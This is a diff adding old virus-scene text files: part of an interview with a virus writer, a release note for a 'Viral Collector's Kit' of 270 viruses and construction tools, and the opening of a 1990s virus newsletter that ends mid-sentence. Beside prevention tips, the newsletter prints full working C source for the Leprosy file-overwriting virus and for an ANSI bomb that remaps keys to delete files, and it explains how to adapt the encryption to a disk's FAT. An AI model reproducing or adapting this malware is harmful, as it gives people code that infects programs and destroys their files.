mag... + + What do you think about the laws against h/p/v that has arrived + lately? + +- They seem to make installation-disks illegal as well... I asked Harry + Onderwater, the chief of the CRI on the hacktic.virus forum about + this; he told he told he would give his view on this, but hasn't done + this yet... + + What do you think about newspapers describing the scene as nerds? + +- Who cares about the opinions of somebody studying something this big + for one single day?! I couldn't care less about those believing every- + thing written in the newspapers... + + Has the scene in any way influented on your real life? + +- Yep, I met many friends there... + + Would you feel guilty if one of your viruses made damage to a hospital? + +- Yes; does this really need an explaination? I always try to make my + viruses as compatible as possible, and surely don't make destructive + ones. Sheesh, it is *way* more difficult to make something really non- + destructive... + + Do you see any differences between the scene now and a couple of + years ago (concerning the underground part ofcause)? + +- Yes, the scene seems to be more focused on personal freedom (Clipper + chip, Drug laws etc...) + + Which virus-magazine do you think is the best avalible now-a-days? + +- All have their individual qualities. (Politically correct or what? ;-) + + Which virus-group/programmer do you admire/like? + +- The non-destructive ones which have the knowledge but still try to + help others... + + Which country is the best virus-writing today? (before it was + Bulgaria, maybe changed?) + +- Bulgaria isn't that active anymore- The US is pretty active, but + considering the size of the Netherlands, I think our country is + pretty good as well... + + Which virus-group(s) do you think is the best? + +- <#include Politically_Correct_Answer.h> + + What do you think about these virus generators, such as PS-MPC? + +- Good generators are real art... + + What do you think about the people using them? + +- Yawn. Wake up, learn some code! + + What do you think about people bragging over (almost) nothing + and ragging with other groups aswell? + +- Well, I admire them. I wish I could be more like them ;-) + + What do you think about such individes as board-crashers? + +- They're ruining the scene, giving hackers a bad name... Luckily, + they're usually morons unable to hack anything but some just-starting + local bbsses... + + Describe the perfect virus : + +- A totally compatible multi-platform virus (Bites from IBM to Amiga + to Mac to...) + + Describe the perfect viruscoder : + +- See abuv... -Creator + + Describe the AV-community with a few lines : + +- Nerds wearing anoracks and such. or- a bunch of would-be cover-girls + eager to attract the public attention, smiling holy and in the + meantime kicking eachother hard below the camera field... ;-) + + Which AV-program do think is the best? + +- F-Prot. It's reliable, has very a detailed virus name library and is + free for individual use... + + What do you think about the underground's future? + +- I think the underground will become even more aimed against the + governmental attempts to limit personal freedom (Clipper chip, net + control, drug laws etc.) + + Do you know/heard of any new technics coming in the near future? + +- I'm pretty sure the PowerPC will give virus authors a wide scala of + new possibilities... + + Any advice to people who want to learn the basic of virus-writing? + +- Try to figure most things out yourself- otherwise you'll force + yourself into the same methods and problems the original author + had, and are later on way less likely to come up with something + new because you're stuck with the standard techniques... + + Something else you wish to say? + +- Quality above quantity! + + Do you wish to send any greets? + +- Nah, I always forget some very important one. Therefore, greetings + to You, the reader (except if you consider yourself for some reason + a foe; decide for yourself :-) \ No newline at end of file diff --git a/textfiles.com/virus/chaos.nfo b/textfiles.com/virus/chaos.nfo new file mode 100644 index 00000000..78d4edd7 --- /dev/null +++ b/textfiles.com/virus/chaos.nfo @@ -0,0 +1,96 @@ + + ۱۱ ߱ + ߱ ۱ + ߱ ߱ ߱ + + + O F + + + ߱ ߱ + + ߱ ߱ + + + + O R I G I N A L R E L E A S E + + Viral Collector's Kit #1 + + By + + The Knights of Chaos + + + Released into the world on 02/04/95 + + +This is a Knights of Chaos Original Release. We've compiled this large package +of 270 viruses, virus creating and writing tools, informational text files +and Virus Group Magazines, and brought them together into VCK #1. + +We plan on releasing 1000+ viruses total in sequel Viral Collector's Kits. + +The Viruses you'll find in this package are documented and BBS ready. What does +that mean? They've been pre file_id.diz'ed with the virus' common name and the +name it can be found under in Patricia Hoffman's Virus Summary (VSUMX 4.1). +Each zip is pre-loaded with a warning disclaimer about the contents, an excerpt +from VSUMX 4.1 about what the virus is and what it does. All you have to do is +put them up on your board if you support virus transfers. + +Our main goal is to provide many computer viruses for reverse engineering for +those who are curious about how viruses work. Many virus source code files are +also included. + + What you get in Viral Collector's Kit #1 + + + You Get: + + Virus Tools and Files + + * 270 Viruses in our Numerical, A, B, and C Groups + (BBS Ready! Pre file_id.diz'd) + * Nowhere Man's Virus Construction Lab + * Mad Maniac's Mutation Engine for Polymorphic Viruses + * Dark Slayer's Confusion Engine for Polymorphic Viruses + * GenVirus Construction Lab (French) + * KOH, An encryption virus for keeping your data secret + * 9 virus ASM files by Immortal Riot + + Programs and Disassembling Tools + + * A86 v4.00 Macro Assembler (Shareware) + * D86 v4.00 Debugger (Shareware) + * Disaster v1.0 Disassembler (Shareware) + * ASM Editor Three (Shareware) + * Nowhere Man's NowhereUtilities + * Detector, A Virus Strain detector + * CatDiz, A File_id.diz cataloging system (Freeware) + * Dizview, View Diz files within Zip Files (Shareware) + * UUENCODE & UUDECODE for sending us files via internet + + Virus Scanners and Virus Signature Update Files + + * VSUMX v4.10 Virus Summary Hypertext (Shareware) + * McAfee Scan v2.14E (Shareware) + * Latest Central Point Anti-Virus 2.x Signature Updates + For Dos and Windows released 01/06/95 + * ThunderByte Anti-Virus v6.31 with processor optimized EXE + files. + + Informational Texts and 'Zines + + * Skism's 40Hex Magazine Issues 1 through 13 + * Phalcon/Skism's Virus Texts 1 through 5 + * Crypt Newsletter Issues 1 through 29 (missing issues) + * NuKE InfoJournals 1 through 8 + + Miscellaneous + + * Knights of Chaos' PGP Public Key + * K-RaD README and VCK-1 Hypertexted files (Be sure to read them!) + +Have Fun! + +Neural Nightmare/K.Chaos '95 diff --git a/textfiles.com/virus/cmvs-1.v1 b/textfiles.com/virus/cmvs-1.v1 new file mode 100644 index 00000000..bc7236a6 --- /dev/null +++ b/textfiles.com/virus/cmvs-1.v1 @@ -0,0 +1,1776 @@ +DISCLAIMER: + +The author will NOT accept responsibility for any damage to your + +computer media and/or files, or responsibility for any action you might + +take that will result in legal proceedings, the source code, if any, in + +this newsletter is THE REAL THING, and you, after you read this, will be + +well aware of what virii are capable of, and knowing that, it is expected + +that you will act responsibly. + + + +DISCLAIMER II: + +All I know about programming I have learned on my own, and did not go to + +school for, and am still learning. As a result, I am sometimes prone to + +make mistakes, and be wrong about things, so please be patient if I should + +make a mistake, or say something that isn't true, which would be totally + +unintentional. + + + + + + ViriiSearch + + ----------- + + + + The Virus Research Newsletter + + + + Volume 1, Number 1 + + + +CREDITS: + +----------------------------------------------------------------------------- + +Author...................................................Criminal Minded + +Editor...................................................Criminal Minded + +Ideas, Source, Examples Supplied By......................Criminal Minded + +Facts Stolen From Several Sources By.....................Criminal Minded + +----------------------------------------------------------------------------- + + + +Introduction: + + + +Welcome To The First Issue Of Viriisearch, The Virus Research Newsletter. + + + +I have always had a fascination of computer virii, since I first heard the + +word. I, like a lot of people, had no idea what they were about, and was + +extremely curious. And this newsletter will cover my process as I find out + +more about them. How they are written, why they act like they do, and if + +possible, why people would write them. + + + +In this issue: + + + +Prevention And Protection Methods + +The "Internet Worm" + +Trojans, Worms, Virii, Ansi Bombs: What's the difference? + +Benign VS Malignant Virii + +Sample Source Code Of Virii + +Discussion Of The Infection And Encryption Methods Used By "Leprosy" + +The "Uncompress" Virus + +"Suicidal Tendencies" Department/Virus Of The Month + +Discussion Of Anti Viral Software + +Things You Should Know + + + +----------------------------------------------------------------------------- + +Prevention And Protection Methods: + +----------------------------------------------------------------------------- + + + +After the infamous "Michelangelo" panic, I realized what the masses are + +lacking is virus literacy. If people had a understanding of them, and knew + +the appropriate methods of prevention, and dealing with a infection, the + +situation would've never been blown out of proportion like it was. When I + +hear people ask questions such as "If I Put My Toothbrush Near A Infected + +Disk, Will I Catch The Virus When I Brush My Teeth?" I have to laugh...Ok, + +maybe that example is a little exaggerated, but some of the questions are + +hitting close to that level of stupidity, so here are some protection and + +prevention methods: + + + +1. If you download a file from a public BBS, or a friend gives you a file + + that he downloaded from somewhere, be sure and uncompress the file onto + + a floppy and run your virus scanner on it. NEVER run a new file without + + checking it first. Some people believe a virus scanner can spot a file + + that is infected within a compressed file by running the virus scanner + + on it, this is NOT true. You have to decompress the file first. + + + + By doing this, you are dropping your chances of infection considerably + + BUT there is always the chance of a unknown virus that the scanner won't + + spot so that is why you have to ALWAYS have a backup of all your data on + + tape or disk. That way if the unknown virus wipes your hard drive, you + + have the backup and nothing is lost. + + + +2. In the event of a virus infection, shut your computer off immediately and + + wait 10-20 seconds. NEVER do a "warm boot" (CTRL-ALT-DEL) because some + + virii can survive through a warm boot. Always do a "cold boot" (Shut the + + computer OFF). After the 10-20 seconds, boot your computer from a CLEAN + + WRITE PROTECTED DOS Bootable disk, and then run your virus scanner from + + a WRITE PROTECTED disk. (The reason for having the disks write protected + + is just in case the virus is still lurking around, it won't be able to + + write itself and infect the floppies). If the virus is a known one, have + + the virus scanner either fix the infected files, or delete them (and + + replace from your backup) or make a note of the infected files and erase + + them manually. + + + +3. How do you spot a attack by a unknown virus? + + + + A) Change in sizes of files + + B) Change of file dates/times + + C) Deleted files + + D) Slower processing time + + E) Unusual messages + + F) Disk activity, more than usual (Writing to the disk when it's not + + neccesary) + + + +4. What to do in the event of a unknown virus attack? + + + + A) Follow steps of shutting machine off and re-booting as outlined in + + #2 + + B) Run your virus scanner and have it look for files that changed in + + size or date (if your scanner has a feature that makes note of + + original virus sizes/dates/times) + + C) If your virus scanner doesn't make note of original sizes/dates/times + + you can always make note of them manually and then check them yourself. + + It's time consuming, but can prevent serious damage to your data, and + + you should try to isolate a infected file and send it to ME (info on + + how to get it to me at the end of the newsletter) so I can attempt to + + dissect it and notify the appropriate person of the new virus. + + D) Some virus scanners come with a TSR that will prevent any writing to + + disk, it will pop a window or message on the screen saying: Attempting + + to write to Do you wish to do so? If something is trying to + + write to a file that shouldn't be written to at that time, chances are + + you are dealing with a unknown virus and should say no. Then try to + + find and isolate the virus. + + E) How do you spot a unknown virus or a known virus without running + + a virus scanner? + + + + 1) Most virii are tiny (2 kilobytes to 10 kilobytes) and the majority + + of them are .COM files so if you have, let's say, a 6K .COM file + + that claims to be a "awesome game" I'd be a little bit suspicious. + + 2) Weird names. I would not run "DIE.COM" or "KILLER.COM" and over + + the years I have run into files named that, when people tried to + + infect my computer. At least they could've named it something else + + not so obvious. + + 3) As stated in #1, the MAJORITY of them are small .COM files but they + + can be .EXE files as well, and bigger then 10K. + + + +All it takes is a little bit of common sense, and 99% of what could've been + +virus attacks on your computer can be prevented. All you have to remember is + +that they cannot infect your machine unless run first...BUT there is one + +virus out there that, when uncompressed, activates itself. This virus does + +NOT have to be executed in order to infect your machine, and it will be + +discussed later on. In the event of where this "uncompress" virus wipes some + +of your data, or any other virus, that's what backups are for. ALWAYS HAVE A + +BACKUP OF YOUR HARD DRIVE and NEVER put a floppy in the drive and run a + +program when there is a virus in memory because, chances are, that floppy + +will get ruined/infected as well, unless it is write protected. The instant + +you are aware of a infection, shut the machine off! Because there are some + +virii that, upon finding a write protected floppy that it cannot infect, or + +something else it can't do, "get mad" and cause destruction. + + + +----------------------------------------------------------------------------- + +The "Internet Worm" + +----------------------------------------------------------------------------- + + + +This has to be the most widely publicized case of a virus attack ever. + + + +On 10/02/88, Robert Morris Jr., a graduate student, wrote and released a worm + +that infected "Internet" the worldwide network. Within hours, it infected + +thousands of computers. The worm was benign, not causing any damage to files + +or media, but replicated itself over and over rapidly, and resulted in the + +computers on Internet having to be shut down and all copies of the worm + +removed. Some of the hosts were still disconnected from the network eight + +days later, showing the impact this worm had. Morris claimed he did it as a + +experiment, and made a mistake in how fast it actually would replicate. The + +media, namely NY Times, USA Today, and The Wall Street Journal, gave the worm + +front page coverage. On November 4th, teams at several institutions went to + +work and successfully "decompiled" the worm and studied it in the language it + +was written in, "C language", but the source code was never released for fear + +of hackers using the source for malicious purposes. In the end, Morris was + +removed from school, ordered to pay $10,000 in fines, perform 400 hours of + +community services and was on 3 years probation. Some people argued as to + +whether or not Morris was guilty because he evidently didn't do it to cause + +damage, but rather as a experiment that went wrong. + + + +What the worm did: It hacked it's way into hosts attached to the internet by + +cracking passwords and then replicated itself rapidly, taking up all the + +memory and forcing the hosts to be shut down. + + + +----------------------------------------------------------------------------- + + + +Trojans, Worms, Virii, Ansi Bombs: What's the difference? + + + +----------------------------------------------------------------------------- + + + +Trojans: Programs disguised as a useful program or a existing real program + + that can cause damage on your system. + + + +Worms: Benign virii, rarely causing damage to media or files, such as the + + Internet worm. + + + +Ansi Bombs: Tiny programs that use ANSI to remap your keyboard causing keys, + + when pressed, to do other things. + + + +Example: If a ansi bomb was in memory, and it remapped the "K" key to erase + + all the files in the current directory, as soon as you pressed K + + the files would be gone. Usually when you type C>ERASE *.* + + MS-DOS will respond with: All the files in the current directory + + will be deleted! Are you sure (y/n)? + + + + Some ansi bombs are intelligent and can prevent such DOS messages + + from appearing. + + + +----------------------------------------------------------------------------- + + + +Here is the source code to a simple ansi bomb: + + + +----------------------------------------------------------------------------- + + + +#include + +#define KILL(K, S) printf("\033[0;%d;\"%s\";13p", K, S) + +#define F1 59 + +#define F2 60 + +#define F3 61 + +#define F4 62 + +main() + +{ + + KILL(F1, "DEL *.ZIP"); + + KILL(F2, "DEL *.ARJ"); + + KILL(F3, "DEL *.COM"); + + KILL(F4, "DEL *.EXE"); + +} + + + +----------------------------------------------------------------------------- + + + +This just assigns the string (DEL *.ZIP etc) to the respective keys. If this + +ansi bomb was in memory, and you pressed F1, it would delete all the files + +in the current directory with the extension of .ZIP. The command (DEL *.ZIP) + +would appear on the screen though, and you could use a file recovery program + +to recover the deleted files. There are more lethal ansi bombs, ones that can + +format your hard drive and other such destructive acts. + + + +Prevention: Use NANSI or ZANSI rather than ANSI and the ansi bombs won't work. + + + +----------------------------------------------------------------------------- + + + +Virii: Destructive programs that use 'stealth' techniques, and can replicate. + + Not All virii are destructive, some can be benign, and just pop up + + annoying messages time to time or slow down system speed. + + + +----------------------------------------------------------------------------- + + + +No more will be discussed of ANSI Bombs or Trojans as this newsletter is + +dedicated entirely to virii. + + + +----------------------------------------------------------------------------- + + + +Benign VS Malignant Virii: + + + +----------------------------------------------------------------------------- + + + +Benign Virii do not cause damage but do things such as take up all the memory, + +slow processing speed down, and send annoying messages to the console, or the + +printer, etc... + + + +Maligant, or Malicious, Virii cause actual destruction, deleting files, + +destroying the FAT or boot sector, locking up the computer, formatting disks + +or hard drives, etc... + + + +----------------------------------------------------------------------------- + + + +Virus Source Code: + + + +----------------------------------------------------------------------------- + + + +Now for the real thing, we will start with the C Language source code to the + +"Leprosy" Virus. + + + +----------------------------------------------------------------------------- + + + +#pragma inline + + + +#define CRLF "\x17\x14" /* CR/LF combo encrypted. */ + +#define NO_MATCH 0x12 /* No match in wildcard search. */ + + + +char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83."; + +char *virus_msg[3] = + + { + + CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", + + CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", + + CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." + + }; + + + + + + + +struct _dta /* Disk Transfer Area format for find. */ + + { + + char findnext[21]; + + char attribute; + + int timestamp; + + int datestamp; + + long filesize; + + char filename[13]; + + } *dta = (struct _dta *) 0x80; /* Set it to default DTA. */ + + + + + +const char filler[] = "XX"; /* Pad file length to 666 bytes. */ + +const char *codestart = (char *) 0x100; /* Memory where virus code begins. */ + +const int virus_size = 666; /* The size in bytes of the virus code. */ + +const int infection_rate = 4; /* How many files to infect per run. */ + + + +char compare_buf[20]; /* Load program here to test infection. */ + +int handle; /* The current file handle being used. */ + +int datestamp, timestamp; /* Store original date and time here. */ + +char diseased_count = 0; /* How many infected files found so far. */ + +char success = 0; /* How many infected this run. */ + + + + + +/* The following are function prototypes, in keeping with ANSI */ + +/* Standard C, for the support functions of this program. */ + + + +int find_first( char *fn ); + +int find_healthy( void ); + +int find_next( void ); + +int healthy( void ); + +void infect( void ); + +void close_handle( void ); + +void open_handle( char *fn ); + +void print_s( char *s ); + +void restore_timestamp( void ); + + + + + + + +/*----------------------------------*/ + +/* M A I N P R O G R A M */ + +/*----------------------------------*/ + + + +int main( void ) { + + int x = 0; + + do { + + if ( find_healthy() ) { /* Is there an un-infected file? */ + + infect(); /* Well, then infect it! */ + + x++; /* Add one to the counter. */ + + success++; /* Carve a notch in our belt. */ + + } + + else { /* If there ain't a file here... */ + + _DX = (int) ".."; /* See if we can step back to */ + + _AH = 0x3b; /* the parent directory, and try */ + + asm int 21H; /* there. */ + + x++; /* Increment the counter anyway, to */ + + } /* avoid infinite loops. */ + + } while( x < infection_rate ); /* Do this until we've had enough. */ + + if ( success ) /* If we got something this time, */ + + print_s( fake_msg ); /* feed 'em the phony error line. */ + + else + + if ( diseased_count > 6 ) /* If we found 6+ infected files */ + + for( x = 0; x < 3; x++ ) /* along the way, laugh!! */ + + print_s( virus_msg[x] ); + + else + + print_s( fake_msg ); /* Otherwise, keep a low profile. */ + + return; + +} + + + + + +void infect( void ) { + + _DX = (int) dta->filename; /* DX register points to filename. */ + + _CX = 0x00; /* No attribute flags are set. */ + + _AL = 0x01; /* Use Set Attribute sub-function. */ + + _AH = 0x43; /* Assure access to write file. */ + + asm int 21H; /* Call DOS interrupt. */ + + open_handle( dta->filename ); /* Re-open the healthy file. */ + + _BX = handle; /* BX register holds handle. */ + + _CX = virus_size; /* Number of bytes to write. */ + + _DX = (int) codestart; /* Write program code. */ + + _AH = 0x40; /* Set up and call DOS. */ + + asm int 21H; + + restore_timestamp(); /* Keep original date & time. */ + + close_handle(); /* Close file. */ + + return; + +} + + + + + +int find_healthy( void ) { + + if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */ + + if ( healthy() ) /* If it's healthy, OK! */ + + return 1; + + else + + while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ + + if ( healthy() ) + + return 1; /* If you find one, great! */ + + if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */ + + if ( healthy() ) /* If it's healthy, OK! */ + + return 1; + + else + + while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ + + if ( healthy() ) + + return 1; /* If you find one, great! */ + + return 0; /* Otherwise, say so. */ + +} + + + + + + + +int healthy( void ) { + + int i; + + datestamp = dta->datestamp; /* Save time & date for later. */ + + timestamp = dta->timestamp; + + open_handle( dta->filename ); /* Open last file located. */ + + _BX = handle; /* BX holds current file handle. */ + + _CX = 20; /* We only want a few bytes. */ + + _DX = (int) compare_buf; /* DX points to the scratch buffer. */ + + _AH = 0x3f; /* Read in file for comparison. */ + + asm int 21H; + + restore_timestamp(); /* Keep original date & time. */ + + close_handle(); /* Close the file. */ + + for ( i = 0; i < 20; i++ ) /* Compare to virus code. */ + + if ( compare_buf[i] != *(codestart+i) ) + + return 1; /* If no match, return healthy. */ + + diseased_count++; /* Chalk up one more fucked file. */ + + return 0; /* Otherwise, return infected. */ + +} + + + + + +void restore_timestamp( void ) { + + _AL = 0x01; /* Keep original date & time. */ + + _BX = handle; /* Same file handle. */ + + _CX = timestamp; /* Get time & date from DTA. */ + + _DX = datestamp; + + _AH = 0x57; /* Do DOS service. */ + + asm int 21H; + + return; + +} + + + + + +void print_s( char *s ) { + + char *p = s; + + while ( *p ) { /* Subtract 10 from every character. */ + + *p -= 10; + + p++; + + } + + _DX = (int) s; /* Set DX to point to adjusted string. */ + + _AH = 0x09; /* Set DOS function number. */ + + asm int 21H; /* Call DOS interrupt. */ + + return; + +} + + + + + +int find_first( char *fn ) { + + _DX = (int) fn; /* Point DX to the file name. */ + + _CX = 0xff; /* Search for all attributes. */ + + _AH = 0x4e; /* 'Find first' DOS service. */ + + asm int 21H; /* Go, DOS, go. */ + + return _AX; /* Return possible error code. */ + +} + + + + + +int find_next( void ) { + + _AH = 0x4f; /* 'Find next' function. */ + + asm int 21H; /* Call DOS. */ + + return _AX; /* Return any error code. */ + +} + + + + + +void open_handle( char *fn ) { + + _DX = (int) fn; /* Point DX to the filename. */ + + _AL = 0x02; /* Always open for both read & write. */ + + _AH = 0x3d; /* "Open handle" service. */ + + asm int 21H; /* Call DOS. */ + + handle = _AX; /* Assume handle returned OK. */ + + return; + +} + + + + + +void close_handle( void ) { + + _BX = handle; /* Load BX register w/current file handle. */ + + _AH = 0x3e; /* Set up and call DOS service. */ + + asm int 21H; + + return; + +} + + + +----------------------------------------------------------------------------- + + + +With source code discussed in this newsletter, main areas covered will be on + +encryption techniques, how the virus infects files, how they 'replicate' + +and 'breed' and how 'stealth techniques' are implemented in the code. + + + +In this case we will cover how the virus infects the files and encrypts. + + + +----------------------------------------------------------------------------- + + + +Infection Method: + + + +----------------------------------------------------------------------------- + +void infect( void ) { + + _DX = (int) dta->filename; /* DX register points to filename. */ + + _CX = 0x00; /* No attribute flags are set. */ + + _AL = 0x01; /* Use Set Attribute sub-function. */ + + _AH = 0x43; /* Assure access to write file. */ + + asm int 21H; /* Call DOS interrupt. */ + + open_handle( dta->filename ); /* Re-open the healthy file. */ + + _BX = handle; /* BX register holds handle. */ + + _CX = virus_size; /* Number of bytes to write. */ + + _DX = (int) codestart; /* Write program code. */ + + _AH = 0x40; /* Set up and call DOS. */ + + asm int 21H; + + restore_timestamp(); /* Keep original date & time. */ + + close_handle(); /* Close file. */ + + return; + +} + + + +----------------------------------------------------------------------------- + +void infect( void ) is just what he named this function. + + + +The function will return nothing, and be called with no parameters as the two + +"voids" suggest. + + + +Register DX points to the filename as declared in the structure "_dta" + + + +----------------------------------------------------------------------------- + + + +_dta structure: + + + +----------------------------------------------------------------------------- + + + +struct _dta + + { + + char findnext[21]; + + char attribute; + + int timestamp; + + int datestamp; + + long filesize; + + char filename[13]; + + } *dta = (struct _dta *) 0x80; + + + +----------------------------------------------------------------------------- + + + +Next in the "infect" function, 0x00 is assigned to the CX register. + + + +With function 43H in assembly, register CX is assigned with the bit of the + +attribute that you want to set the file to. + + + +Bit: Attribute: + + + + 0 Read Only + + 1 Hidden + + 2 System + + 3-4 Reserved + + 5 Archive + + 6-15 Reserved + + + +Because the author assigned 0x00 to CX, none of the above attributes were set + +on the file, allowing it to be written to. + + + +Next in the "infect" function is 0x01 being assigned to register AL + + + +0x01 is telling the program we want to SET attributes. + + + +Then following that is: 0x43 being assigned to AH + + + +Which is telling the program we want to use function 43H (Get/Set Attributes) + + + +The current handle is assigned to register BX + + + +The size of the virus code, or the number of bytes to write, stored in the + +integer "virus_size" is assigned to register CX + + + +virus_size is declared and initialized at the beginning of the source code + +as a integer with the value "666" + + + +Then the virus code is written to the file, the file is closed and the + +original date and time the file had are restored. + + + +----------------------------------------------------------------------------- + + + +The Method Of Encryption: + + + +----------------------------------------------------------------------------- + +void print_s( char *s ) { + + char *p = s; + + while ( *p ) { /* Subtract 10 from every character. */ + + *p -= 10; + + p++; + + } + + _DX = (int) s; /* Set DX to point to adjusted string. */ + + _AH = 0x09; /* Set DOS function number. */ + + asm int 21H; /* Call DOS interrupt. */ + + return; + +} + +----------------------------------------------------------------------------- + + + +The above function used in "Leprosy", called "print_s" accepts one parameter, + +a string of text, like these ones defined at the beginning of the Leprosy + +source code: + + + +----------------------------------------------------------------------------- + +char *virus_msg[3] = + + { + + CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", + + CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", + + CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." + + }; + + + +----------------------------------------------------------------------------- + +Note: CRLF is defined as "\x17\x14" at the beginning of the source, \x17 + +being the hexadecimal code for a carriage return and \x14 the code for a line + +feed. + +----------------------------------------------------------------------------- + + + +When a string is passed to the "print_s" function, it is un-encrypted. + + + +print_s(virus_msg[0]); + +print_s(virus_msg[1]); + +print_s(virus_msg[2]); + + + +would result in the following being printed to the screen: + +------------------------------------------------------------ + + + + NEWS FLASH!! Your system has been infected with the + + + + incurable decay of LEPROSY 1.00, a virus invented by + + + + PCM2 in June of 1990. Good luck! + + + +----------------------------------------------------------- + + + +The compiler I currently use does not accept inline assembly + +code as the author of leprosy had in his source so I modified + +the "print_s" function so I could compile it: + + + +For those interested, I use Microsoft Quick C (C) Microsoft + + + +----------------------------------------------------------- + + + +/* NOTE: I removed the . from the end of each message because that is */ + +/* A $ when un-encrypted, and the $ to terminate the string is only */ + +/* required for the assembly version of the "print_s" function */ + + + +/* Also: The hexadecimal constants in the strings are as follows: */ + + + +/* \x13 = TAB, \x7f = u, \x83 = y, \x81 = w, \x80 = v */ + + + + + +#include + +#define CRLF "\x17\x14" + +char *virus_msg[3] = + +{ + +CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro", + +CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83", + +CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14" + +}; + + + +void print_s (char *s); + +int main (void); + + + +main() + +{ + +print_s(virus_msg[0]); + +print_s(virus_msg[1]); + +print_s(virus_msg[2]); + +} + + + +void print_s (char *s) { + + char *p = s; + + while ( *p ) { + + *p -= 10; + + p++; + + } + + printf("%s\n",s); + +} + + + +----------------------------------------------------------------------------- + + + +*p -= 10; is what does it all. It adds the value of 10 to each character and + +can be used either way, to unencrypt or to encrypt. + + + +if you change it to: *p += 10; + + + +it will then encrypt. + + + +You can also change it to: + + + +*p -= rand() % 35000; /* #include for "rand()" */ + + + +and it will change the value it uses to encrypt or un-encrypt everytime it + +passes through the "while" loop or you can change it to any value you like. + + + +----------------------------------------------------------------------------- + + + +This method of encryption can be used to encrypt files, file allocation + +tables, boot sectors, etc. All you need is a function that reads and writes + +either of the three. For instance, read the contents of the File Allocation + +Table, and pass the string(s) through the print_s function and then write + +the encrypted string(s) back to the File Allocation Table. I don't suggest + +doing this to your hard drive, or anyone elses, for it will result in either + +you or the other person having to crack the encryption and restore the FAT + +manually, or formatting the hard drive and replacing all the files. If you + +want to experiment, do it on a floppy, like I did. + + + +----------------------------------------------------------------------------- + + + + + +The "uncompress" virus + + + +----------------------------------------------------------------------------- + + + +According to the person who uploaded it to the BBS where I got it from, this + +virus infects when you uncompress the file. + + + +I did not find any indication of this when I uncompressed the file, called + +NJERU.ARJ. It is a Arkanoid II: Revenge Of Doh crack released by FiRM that + +is infected with a strain of Jerusalem-4. + + + +I ran it and Norton Anti Virus (C) Symantec reported the virus in memory. + +I then proceeded to run EDLIN.EXE (C) Microsoft, SYS.COM (C) Microsoft, + +COMMAND.COM (C) Microsoft, and ARJ.EXE (C) Robert K. Jung to see what would + +happen. These are the results: + + + +Filename: Original Size: Size After Infection: + + + +EDLIN.EXE 14,121 bytes 15,936 bytes + +ARJ.EXE 98,968 bytes 100,784 bytes + +SYS.COM 13,440 bytes 15,253 bytes + + + +There were no size changes to COMMAND.COM, nor was it infected. + + + +A file was also created by the virus called "NJVR._OO" that was around 26K + +but only had one line in it, a error message concerning the media of the disk. + +Sorry, the exact size of the file NVJR._OO and the exact message are not + +available. When I attempted to remove the apparent text file using the + +MS-DOS "DEL" command, it displayed the error message and tried to write to + +drive A which was write protected at the time. Then it went back to drive B + +and apparently did damage to the media. I formatted the disk and it was fine + +afterwards. I have never seen anything like this before, a text file being + +able to do damage just by attempting to delete it. I guess it wasn't a text + +file after all but I still have no idea how it managed to corrupt the media + +on drive B. It also created a file called "N" which was 0 bytes and couldn't + +be deleted or read by Norton Anti Virus. + + + +----------------------------------------------------------------------------- + + + +"Suicidal Tendencies" Department. + + + +(Appropriately named department: I can't believe I am deliberately running + +a virus on my system) + + + +This section of the newsletter will cover what happened when I run a virus + +on a floppy with MSDOS.SYS, IO.SYS, COMMAND.COM, a overlay file, a .EXE file + +and a few other assorted files on it. + + + +The virus of the month award goes to: The Perfume Virus + + + +----------------------------------------------------------------------------- + + + +What Happened: + + + +----------------------------------------------------------------------------- + + + +Filename: PERFUME.COM Filesize: 806 bytes + + + +Ok, I placed this file on drive B with the following files: + + + +Filename: Original Size: + +---------------------------------- + +COMMAND.COM 47845 + +MSDOS.SYS 37394 + +IO.SYS 33430 + +ANSI.SYS 9029 + +RAMDRIVE.SYS 5873 + +CONFIG.SYS 39 + +UNDELETE.EXE 13924 + +AUTOEXEC.BAT 69 + +15ALL05.DEF 67278 + +MICHEL.DEF 456 + +NSETUP.OVL 876 + +PKUNZIP.EXE 23528 + +---------------------------------- + + + +When I ran PERFUME.COM, it displayed the message: This is a tiny COM program. + +and it infected COMMAND.COM, enlarging it by 765 bytes to 48,610 bytes. + +It then proceeded to remove the hidden/system attribute from MSDOS.SYS but + +didn't infect it and then attempted to infect the disk in drive A, which was + +write protected at the time. The virus, realizing it couldn't write to drive + +A, displayed the message: + + Not ready reading drive A + + Insert disk with \COMMAND.COM in drive A + + Press any key to continue . . . + + + +Now, usually when DOS displays that message, it only needs to READ, and still + +could've if the disk was write protected, so evidently the virus was + +trying to outsmart me and fool me into thinking that was a DOS message so it + +could infect at least one more disk. + + + +I ran Norton Anti Virus v2.0 (C) Symantec, and it reported Perfume in memory + +so I re-booted and ran NAV again, this time it didn't report the virus being + +in memory, but did identify COMMAND.COM and PERFUME.COM as being infected. + + + +Also: + + + +In my search for the virus of the month, I came across a file called + +"ISRAELI.ZIP" which I thought to be a virus called "Israeli" but as it turns + +out it was a strain of Jerusalem-4, the same as the supposed "Uncompress + +virus" discussed earlier. The file was called: SORTINFT.EXE and was 3760 + +bytes. When I ran it, it did no damage to the disk or files but NAV did + +report Jerusalem-4 in memory so I re-booted. I then ran NAV again and when + +the screen came up saying who the copy of NAV was registered to, it said: + + + +Registered To: + + + +Criminal 